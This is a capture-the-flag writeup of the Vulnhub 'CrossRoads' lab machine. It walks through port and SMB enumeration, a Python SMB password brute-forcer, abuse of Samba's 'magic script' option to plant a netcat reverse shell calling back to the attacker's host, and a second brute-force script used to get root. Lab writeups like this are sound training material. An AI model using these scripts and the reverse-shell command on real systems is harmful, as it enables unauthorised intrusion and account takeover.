Welcome to the CrossRoads writeup from Vulnhub
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
CrossRoads
tags: Vulnhub
Easy
Linux
Platform: Vulnhub
Difficult: Easy
S.O.: Linux
Link: Click here
Enumeration
Nmap
To get started, we run a quick open ports scan.
# nmap -p- -T4 192.168.1.152
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-24 09:45 CET
Nmap scan report for 192.168.1.152
Host is up (0.0027s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 11.95 seconds
Now that we know the open ports, let's scan them in depth.
# nmap -A -Pn -p 80,139,445 192.168.1.152
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-24 09:46 CET
Nmap scan report for 192.168.1.152
Host is up (0.0011s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/crossroads.png
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 12 Step Treatment Center | Crossroads Centre Antigua
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (93%), Linux 3.2 - 4.9 (93%), Linux 2.6.32 - 3.10 (93%), Linux 3.4 - 3.10 (92%), Synology DiskStation Manager 5.2-5644 (91%), Netgear RAIDiator 4.2.28 (91%), Linux 3.1 (91%), Linux 3.2 (91%), Linux 2.6.32 - 2.6.35 (91%), Linux 2.6.32 - 3.5 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CROSSROADS
Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: CROSSROADS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: crossroads
| NetBIOS computer name: CROSSROADS\x00
| Domain name: \x00
| FQDN: crossroads
|_ System time: 2021-03-24T03:46:54-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-03-24T08:46:54
|_ start_date: N/A
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 0.30 ms SupTecnico.mshome.net (172.22.192.1)
2 1.40 ms 192.168.1.152
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.42 seconds
Gobuster
# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.152/ -x php,txt,html,bak
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.152/
[+] Threads: 10
[+] Wordlist: directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: bak,php,txt,html
[+] Timeout: 10s
===============================================================
2021/03/24 09:32:27 Starting gobuster
===============================================================
/index.html (Status: 200)
/robots.txt (Status: 200)
/note.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2021/03/24 09:39:43 Finished
===============================================================
Ok, inside the web server there is a file called note.txt
, let's see it.
# curl http://192.168.1.152/note.txt
just find three kings of blues
then move to the crossroads
-------------------------------
-abuzerkomurcu
And now, let's enumerate the SMB.
SMB
# enum4linux -a 192.168.1.152
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Mar 24 18:08:42 2021
==========================
| Target Information |
==========================
Target ........... 192.168.1.152
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
..........................................................................
..........................................................................
============================
| Users on 192.168.1.152 |
============================
index: 0x1 RID: 0x3e9 acb: 0x00000010 Account: albert Name: Desc:
user:[albert] rid:[0x3e9]
..........................................................................
..........................................................................
[+] Found domain(s):
[+] CROSSROADS
[+] Builtin
..........................................................................
..........................................................................
======================================================================
| Users on 192.168.1.152 via RID cycling (RIDS: 500-550,1000-1050) |
======================================================================
S-1-5-21-198007098-3908253677-2746664996-501 CROSSROADS\nobody (Local User)
S-1-5-21-198007098-3908253677-2746664996-513 CROSSROADS\None (Domain Group)
S-1-5-21-198007098-3908253677-2746664996-1001 CROSSROADS\albert (Local User)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
Well, among all the information obtained, we have got a user called albert
, let's see if we can obtain his password with brute force.
Exploitation
We are going to write a small script to perform brute force.
#! /usr/bin/python
import smb
from smb.base import SharedDevice
from smb.SMBConnection import SMBConnection
host = '192.168.1.152'
user = 'albert'
passList = open('/usr/share/wordlists/rockyou_utf8.txt', 'r').readlines()
for passwd in passList:
conn = SMBConnection(user, passwd.strip(), 'pycon', host, use_ntlm_v2=True, domain='', sign_options=SMBConnection.SIGN_WHEN_SUPPORTED, is_direct_tcp=True)
connection = conn.connect(host, 445)
if connection:
print("[+] User Credentials Successful: " + user + ":" + passwd.strip())
exit(0)
else:
print("[-] Login Failed for: " + user + ":" + passwd.strip())
And let's run it!
# python3 smbbruter.py
[-] Login Failed for: albert:123456
[-] Login Failed for: albert:12345
[-] Login Failed for: albert:123456789
..........................................................................
..........................................................................
[+] User Credentials Successful: albert:bradley1
Perfect, let's see what shared resources the user has.
# smbclient -L //192.168.1.152 -U albert
Enter WORKGROUP\albert's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
smbshare Disk
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
albert Disk Home Directories
SMB1 disabled -- no workgroup available
And now, we are going to explore the albert
share.
# smbclient //192.168.1.152/albert -U albert
Enter WORKGROUP\albert's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Mar 6 13:45:15 2021
.. D 0 Tue Mar 2 23:00:47 2021
smbshare D 0 Tue Mar 2 23:16:13 2021
crossroads.png N 1583196 Tue Mar 2 23:34:03 2021
beroot N 16664 Wed Mar 3 00:02:41 2021
user.txt N 1805 Sun Jan 3 18:56:19 2021
4000320 blocks of size 1024. 3759668 blocks available
smb: \> get user.txt
getting file \user.txt of size 1805 as user.txt (97,9 KiloBytes/sec) (average 97,9 KiloBytes/sec)
smb: \> get beroot
getting file \beroot of size 16664 as beroot (428,2 KiloBytes/sec) (average 322,1 KiloBytes/sec)
smb: \> cd smbshare
smb: \smbshare\> ls
. D 0 Tue Mar 2 23:16:13 2021
.. D 0 Sat Mar 6 13:45:15 2021
smb.conf N 8779 Tue Mar 2 23:14:54 2021
4000320 blocks of size 1024. 3759668 blocks available
smb: \smbshare\> get smb.conf
getting file \smbshare\smb.conf of size 8779 as smb.conf (1428,9 KiloBytes/sec) (average 429,2 KiloBytes/sec)
Get user flag
# cat user.txt
flag 1/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░░░░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░░▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
# cat smb.conf
..........................................................................
..........................................................................
path = /home/albert/smbshare
valid users = albert
browsable = yes
writable = yes
read only = no
magic script = smbscript.sh
guest ok = no
We can see that the magic script parameter has the smbscript.sh
script configured so if we see what that parameter does, maybe we should be able to create that script and upload it to SMB along with the smb.conf
file to run our script and thus get a reverse shell. Let's try.
We need to create the smbscript.sh
with the reverse shell.
# cat smbscript.sh
nc -e /bin/sh 192.168.1.100 8787
And now, upload it to SMB with a terminal listening.
smb: \smbshare\> put smbscript.sh
And... got shell!
# nc -lnvp 8787
listening on [any] 8787 ...
connect to [192.168.1.100] from (UNKNOWN) [192.168.1.152] 35112
id
uid=1000(albert) gid=1000(albert) groups=1000(albert)
Post exploitation
Enumeration
albert@crossroads:/home/albert$ wget 192.168.1.100/rockyou_utf8.txt
--2021-03-24 13:36:06-- http://192.168.1.100/rockyou_utf8.txt
Connecting to 192.168.1.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 140056880 (134M) [text/plain]
Saving to: ‘rockyou_utf8.txt’
rockyou_utf8.txt 100%[=======================================================================================================================================>] 133.57M 150MB/s in 0.9s
2021-03-24 13:36:07 (150 MB/s) - ‘rockyou_utf8.txt’ saved [140056880/140056880]
albert@crossroads:/home/albert$
#!/usr/bin/python
import subprocess
passList = open('rockyou_utf8.txt', 'r').readlines()
for passwd in passList:
response = subprocess.getoutput('echo "{}" | ./beroot'.format(passwd))
if 'wrong password!!!' not in response:
print('Password found: {}'.format(passwd))
break
if 'wrong password!!!' not in response:
print("This is the output: \n{}".format(response))
albert@crossroads:/home/albert$ python3 berootBruter.py
Password found: lemuel
enter password for root
-----------------------
do ls and find root creds
Great! We already have the correct password and now it asks us to do ls
to find the credentials. By doing ls
we see that there is a new file called rootcreds
. Let's see them and authenticate as root.
albert@crossroads:/home/albert$ ls
beroot berootBruter.py crossroads.png rockyou_utf8.txt rootcreds smbshare user.txt
albert@crossroads:/home/albert$ cat rootcreds
root
___drifting___
root@crossroads:/home/albert# id
uid=0(root) gid=0(root) groups=0(root)
root@crossroads:/home/albert# cd /root
root@crossroads:~# ls
beroot.sh creds passwd root.txt
root@crossroads:~# cat root.txt
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
congratulations!
root@crossroads:~#
It is entertaining but, it is too CTF style for my liking. Anyway, nice box!